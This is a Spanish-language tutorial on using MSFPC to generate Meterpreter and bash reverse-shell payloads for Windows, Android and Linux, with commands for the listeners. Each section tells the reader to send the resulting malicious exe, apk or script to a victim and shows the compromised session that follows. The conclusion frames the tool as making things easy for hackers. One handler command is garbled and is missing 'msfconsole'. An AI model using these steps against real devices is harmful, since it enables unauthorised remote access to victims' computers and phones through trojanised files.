GENERAR PAYLOADS PARA ANDROID, WINDOWS Y LINUX EN UN MINUTO

INTRODUCCIÓN

MSFvenom Payload Creator (MSFPC) es una herramienta para la creación de cargas útiles (payloads). MSFPC puede generar diferentes cargas de Windows, Android o Linux en un minuto. Es una manera fácil de generar cargas útiles de Meterpreter usando MSFvenom (parte del marco Metasploit). Esta herramienta facilita su uso para crear una carga útil y explotar la máquina de la víctima. MSFPC puede identificar automáticamente la interfaz, la dirección IP, etc. Investigadores en hacking ético del Instituto Internacional de Seguridad Cibernética (IICS) han demostrado muchas otras cargas útiles que son completamente indetectables. Este MSFPC es una herramienta preinstalada en Kali Linux.

ENTORNO

  • SO: Kali Linux 2020 64bit
  • Versión de Kernel: 5.6.0

PASOS DE EJECUCION

  • Use el comando msfpc -h para encontrar la opción de ayuda
MSFPC - Help Fig 1

MSFPC - Help Fig 2

GENERAR CARGA DE WINDOWS

  • Ahora use el comando msfpc <TYPE> (<DOMAIN/IP>) (<PORT>) para generar la carga útil
  • Use el comando msfpc windows 192.168.0.51 4444 para ejecutar
MSFPC - Windows Payload
  • Ahora, abra la otra terminal y ejecute el comando msfconsole -q -r ‘/home/iicybersecurity/windows-meterpreter-staged-reverse-tcp-4444-exe.rc’ para iniciar el controlador
MSFPC - Windows Handler
  • Para las pruebas, envíe este archivo exe malicioso generado a la víctima
MSFPC - Windows Malicious EXE file
  • Si la víctima ejecuta el archivo exe, podemos acceder a la máquina comprometida
MSFPC - Exploited Windows machine
  • Con éxito obtuvimos la sesión y podemos acceder a las máquinas de la víctima

GENERAR CARGA DE ANDROID

  • Ahora, explotemos el teléfono Android usando MSFPC.
  • Cree un archivo apk utilizando el comando msfpc apk 192.168.0.51 5555
MSFPC - Android APK
  • Se creó con éxito la carga útil
  • A continuación, inicie el controlador con el siguiente comando
  • msfconsole -q -r ‘/home/iicybersecurity/android-meterpreter-stageless-reverse-tcp-5555-apk.rc’
MSFPC - APK Handler
  • Ahora envíe el archivo apk a la víctima. Si la víctima instala el archivo apk, en su móvil
MSFPC - APK File
  • En las máquinas hackers se abrirá sesión
MSFPC - Exploited Victim's Phone
  • Con éxito podemos acceder a las víctimas móviles

GENERAR CARGA DE LINUX

  • Ahora explotemos la máquina Linux usando MSFPC
  • Use el comando msfpc bash 192.168.0.51 2222 para explotar la máquina Linux
MSFPC - Linux Payload
  • Creó con éxito la carga útil
  • Luego use el comando -q -r ‘/home/iicybersecurity/bash-shell-staged-reverse-tcp-2222-sh.rc’ para iniciar el controlador
MSFPC - Linux Handler
  • Ahora, envíe el archivo malicioso a la víctima
  • Si la víctima ejecuta estos comandos en la máquina
    • Chmod +x bash-shell-staged-reverse-tcp-2222.sh
    • ./ bash-shell-staged-reverse-tcp-2222.sh
  • La sesión se iniciará automáticamente en la máquina del hacker
MSFPC - Exploited Linux Machine
  • Se explotó con éxito la máquina de Linux

CONCLUSIÓN

Como vimos, cómo crear carga útil y explotar Windows, Linux y Android usando MSFPC. Este MSFPC facilita el uso de los hackers y sin recordar los comandos.